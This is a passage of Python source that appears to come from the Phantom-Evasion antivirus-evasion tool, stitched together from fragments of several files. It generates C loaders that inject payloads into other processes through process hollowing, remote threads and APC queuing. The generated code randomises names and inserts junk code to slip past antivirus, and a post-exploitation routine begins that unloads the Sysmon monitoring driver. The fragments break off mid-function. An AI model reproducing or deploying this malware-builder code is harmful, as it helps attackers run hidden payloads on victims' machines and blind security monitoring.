Ret_code += "USHORT Offset : 12;"
Ret_code += "USHORT Type : 4;"
Ret_code += "} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;\n"
Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
Ret_code += RandImgDosHeader + " = (PIMAGE_DOS_HEADER)" + Randlpv + ";\n"
if ModOpt["DynImport"] == True:
NdcReadProcessMemory = varname_creator()
NdcWriteProcessMemory = varname_creator()
NdcVirtualAllocEx = varname_creator()
NdcVirtualProtectEx = varname_creator()
Ret_code += "FARPROC " + NdcReadProcessMemory + " = GetProcAddress(" + Wininet + ", \"ReadProcessMemory\");\n"
Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + Wininet + ", \"WriteProcessMemory\");\n"
Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
Ret_code += "FARPROC " + NdcVirtualProtectEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualProtectEx\");\n"
if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:
Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n"
Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"
if ModOpt["Arch"] == "x86":
if ModOpt["DynImport"] == True:
Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"
else:
Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"
else:
if ModOpt["DynImport"] == True:
Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n" #if x64 proc
else:
Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n"
Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"
if ModOpt["DynImport"] == True:
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
else:
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
elif ModOpt["ExecMethod"] in ["Chimera","C"]:
#Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n"
#Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"
Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
#Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"
if ModOpt["DynImport"] == True:
#Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
#Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
#Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
#Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
else:
#Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
#Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "}else{\n"
Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
#Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
#Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
Ret_code += "SIZE_T " + RandDelta + " = (SIZE_T)" + RandlpNewImgBAddr + "-" + RandImgNTHeader + "->OptionalHeader.ImageBase;\n"
Ret_code += RandImgNTHeader + "->OptionalHeader.ImageBase = (SIZE_T)" + RandlpNewImgBAddr + ";\n"
if ModOpt["DynImport"] == True:
Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"
else:
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"
Ret_code += "if(" + RandDelta + " != 0){\n"
Ret_code += "for (int " + Randflag2 + " = 0;" + Randflag2 + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag2 + "++){\n"
#.reloc section
Ret_code += "char* " + RandSectName + " = \".reloc\";\n"
Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag2 + "*sizeof(IMAGE_SECTION_HEADER)));\n"
Ret_code += "if(memcmp(" + RandImgSectHeader + "->Name, " + RandSectName + ",strlen(" + RandSectName + ")))continue;\n"
Ret_code += "DWORD " + RandRelocSectRawData + " = " + RandImgSectHeader + "->PointerToRawData;\n"
Ret_code += "DWORD " + RandOffsetInRelocSect + " = 0;\n"
Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
#relocation data
Ret_code += "while(" + RandOffsetInRelocSect + "<" + RandrelocData + ".Size){\n"
Ret_code += "PBASE_RELOCATION_BLOCK pBlockheader = (PBASE_RELOCATION_BLOCK)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_BLOCK);\n"
Ret_code += "DWORD " + RandEntryCount + " = pBlockheader->BlockSize - (sizeof(BASE_RELOCATION_BLOCK)) / (sizeof(BASE_RELOCATION_ENTRY));\n"
Ret_code += "PBASE_RELOCATION_ENTRY " + RandPBlocks + " = (PBASE_RELOCATION_ENTRY)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
Ret_code += "for(DWORD " + Randflag3 + " =0;" + Randflag3 + "<" + RandEntryCount + ";" + Randflag3 + "++){\n"
Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_ENTRY);\n"
Ret_code += "if(" + RandPBlocks + "[" + Randflag3 + "].Type==0)continue;\n"
Ret_code += "SIZE_T " + RandFieldAddr + " = pBlockheader->PageAddress + " + RandPBlocks + "[" + Randflag3 + "].Offset;\n"
Ret_code += "SIZE_T " + RandDwBuff + " = 0;\n"
if ModOpt["DynImport"] == True:
Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"
Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"
else:
Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"
Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"
Ret_code += "for(int " + Randflag + " = 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
Ret_code += "DWORD " + RandlNewProtect + " = 0;\n"
Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_EXECUTE){\n"
Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READWRITE;\n"
Ret_code += "}else{\n"
Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READ;}\n"
Ret_code += "}else{\n"
Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
Ret_code += RandlNewProtect + " = PAGE_EXECUTE_WRITECOPY;\n"
Ret_code += "}else{\n"
Ret_code += RandlNewProtect + " = PAGE_EXECUTE;}}\n"
Ret_code += "}else{\n"
Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
Ret_code += RandlNewProtect + " = PAGE_READWRITE;\n"
Ret_code += "}else{\n"
Ret_code += RandlNewProtect + " = PAGE_READONLY;}\n"
Ret_code += "}else{\n"
Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
Ret_code += RandlNewProtect + " = PAGE_WRITECOPY;\n"
Ret_code += "}else{\n"
Ret_code += RandlNewProtect + " = PAGE_NOACCESS;}}}\n"
Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_NOT_CACHED){\n"
Ret_code += RandlNewProtect + " |= PAGE_NOCACHE;}\n"
if ModOpt["DynImport"] == True:
Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"
else:
Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"
if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:
if ModOpt["DynImport"] == True:
NdcSetThreadContext = varname_creator()
NdcResumeThread = varname_creator()
if ModOpt["Arch"] == "x86":
Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"
else:
Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"
Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"SetThreadContext\");\n"
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"ResumeThread\");\n"
Ret_code += NdcSetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
Ret_code += NdcResumeThread + "(" + Randpi + ".hThread);\n"
else:
if ModOpt["Arch"] == "x86":
Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"
else:
Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"
Ret_code += "SetThreadContext(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
Ret_code += "ResumeThread(" + Randpi + ".hThread);\n"
Ret_code += "return 1;\n"
Ret_code += "}}\n"
elif ModOpt["ExecMethod"] in ["Chimera","C"]:
Randthread = varname_creator()
Randhand = varname_creator()
Randresult = varname_creator()
if ModOpt["DynImport"] == True:
NdcCreateRemoteThread = varname_creator()
NdcWaitForSingleObject = varname_creator()
Ret_code += "DWORD " + Randthread + ";\n"
Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
Ret_code += "HANDLE " + Randhand + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
Ret_code += NdcWaitForSingleObject + "(" + Randhand + ",-1);}}}}\n"
else:
Ret_code += "DWORD " + Randthread + ";\n"
Ret_code += "HANDLE " + Randhand + " = CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint),NULL,0,&"+ Randthread + ");\n"
Ret_code += "DWORD " + Randresult + " = WaitForSingleObject(" + Randhand + ",-1);}}}}\n"
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c",Ret_code)
# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import CheckForBackslash
from usefull import generic_evasion
BashOneliner = CheckForBackslash(sys.argv[1])
Randvarname = varname_creator()
Randptr = varname_creator()
# Random Junkcode
Junkcode_01 = Junkmathinject()
Junkcode_02 = Junkmathinject()
Junkcode_03 = Junkmathinject()
Junkcode_04 = Junkmathinject()
Junkcode_05 = Junkmathinject()
Junkcode_06 = Junkmathinject()
Junkcode_07 = Junkmathinject()
Junkcode_08 = Junkmathinject()
MorphEvasion1 = generic_evasion()
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
import usefull
Payload = sys.argv[1]
Filename = sys.argv[2]
Encryption = sys.argv[3]
Randbufname = usefull.varname_creator()
Payload = usefull.encoding_manager(Encryption, Payload, Randbufname)
Ndcvirtual = usefull.varname_creator()
Ker32 = usefull.varname_creator()
Randlpv = usefull.varname_creator()
Randhand = usefull.varname_creator()
Randresult = usefull.varname_creator()
Randthread = usefull.varname_creator()
def Win_LocalThread(ModOpt):
Ret_code = ""
Randhand = varname_creator()
Randresult = varname_creator()
Ret_code += "HANDLE " + Randhand + ";\n"
if ModOpt["ExecMethod"] == "Thread":
Randthread = varname_creator()
Ret_code += "DWORD " + Randthread + ";\n"
if ModOpt["DynImport"] == True:
NdcCreateThread = varname_creator()
Ret_code += "FARPROC " + NdcCreateThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateThread\");\n"
Ret_code += Randhand + " = (HANDLE)" + NdcCreateThread + "(NULL,0,(LPVOID)" + ModOpt["Lpvoid"] + ",NULL,0,&" + Randthread + ");\n"
else:
Ret_code += Randhand + " = CreateThread(NULL,0,(LPVOID)" + ModOpt["Lpvoid"] + ",NULL,0,&" + Randthread + ");\n"
elif ModOpt["ExecMethod"] == "ThreadSR":
Randthread = varname_creator()
ResThread = varname_creator()
if ModOpt["DynImport"] == True:
NdcCreateThread = varname_creator()
NdcResumeThread = varname_creator()
Ret_code += "FARPROC " + NdcCreateThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateThread\");\n"
Ret_code += Randhand + " = (HANDLE)" + NdcCreateThread + "(NULL,0,(LPVOID)" + ModOpt["Lpvoid"] + ",NULL,0x00000004,&" + Randthread + ");\n"
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
Ret_code += "DWORD " + ResThread + " = (DWORD)" + NdcResumeThread + "(" + Randhand + ");\n"
else:
Ret_code += "DWORD " + Randthread + ";\n"
Ret_code += Randhand + " = CreateThread(NULL,0,(LPVOID)" + ModOpt["Lpvoid"] + ",NULL,0x00000004,&" + Randthread + ");\n"
Ret_code += "DWORD " + ResThread + " = ResumeThread(" + Randhand + ");\n"
elif ModOpt["ExecMethod"] == "NtThread":
NTCT_load = varname_creator()
Ret_code += "FARPROC " + NTCT_load + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"NtCreateThread\");\n"
Ret_code += NTCT_load + "(&"+ Randhand + ", GENERIC_ALL, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)" + ModOpt["Lpvoid"] + ", NULL, NULL, NULL, NULL, NULL,NULL);"
elif ModOpt["ExecMethod"] == "NtThreadSR":
NTCT_load = varname_creator()
ResThread = varname_creator()
NdcResumeThread = varname_creator()
Ret_code += "FARPROC " + NTCT_load + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"NtCreateThread\");\n"
Ret_code += NTCT_load + "(&"+ Randhand + ", GENERIC_ALL, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)" + ModOpt["Lpvoid"] + ", NULL, NULL, NULL, NULL, NULL,TRUE);"
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
Ret_code += "DWORD " + ResThread + " = (DWORD)" + NdcResumeThread + "(" + Randhand + ");\n"
if ModOpt["ExecMethod"] == "APC":
RandAPC = varname_creator()
Ret_code += "PTHREAD_START_ROUTINE " + RandAPC + " = (PTHREAD_START_ROUTINE)" + ModOpt["Lpvoid"] + ";\n"
if ModOpt["DynImport"] == True:
QUAPC_load = varname_creator()
SE_load = varname_creator()
Ret_code += "FARPROC " + QUAPC_load + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"QueueUserAPC\");\n"
Ret_code += "FARPROC " + SE_load + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"SleepEx\");\n"
Ret_code += QUAPC_load + "((PAPCFUNC)" + RandAPC + ", GetCurrentThread(),(ULONG_PTR)NULL);\n"
Ret_code += SE_load + "(-1,TRUE);\n"
else:
Ret_code += "QueueUserAPC((PAPCFUNC)" + RandAPC + ", GetCurrentThread(),(ULONG_PTR)NULL);\n"
Ret_code += "SleepEx(-1,TRUE);\n"
else:
if ModOpt["DynImport"] == True:
NdcWaitForSingleObj = varname_creator()
Ret_code += "FARPROC " + NdcWaitForSingleObj + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"WaitForSingleObject\");\n"
Ret_code += "DWORD " + Randresult + " = " + NdcWaitForSingleObj + "(" + Randhand + ",-1);\n"
else:
Ret_code += "DWORD " + Randresult + " = WaitForSingleObject(" + Randhand + ",-1);\n"
return Ret_code
def Postex_C_UnloadSysmonDriver_windows(ModOpt):
RandhToken = varname_creator()
RandTokenPriv = varname_creator()
RandLuid = varname_creator()
NdcFilterUnload = varname_creator()
Ret_code = ""
IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]
Ret_code += IncludeShuffler(IncludeList)
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
if ModOpt["Reflective"] == True:
Ret_code += "#include \"ReflectiveLoader.h\"\n"
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
